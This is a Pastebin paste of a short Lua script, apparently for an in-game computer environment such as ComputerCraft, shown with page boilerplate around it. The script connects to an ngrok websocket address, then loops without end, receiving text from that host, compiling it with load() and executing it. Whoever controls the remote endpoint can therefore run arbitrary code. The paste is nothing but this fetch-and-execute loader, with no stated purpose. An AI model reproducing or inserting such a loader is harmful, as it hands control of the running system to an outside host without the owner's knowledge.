Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ws=http.websocket("ws://10e7-46-149-216-31.ngrok-free.app")
- while true do
- a=ws.receive()
- a, b, c = load(a)
- a()
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement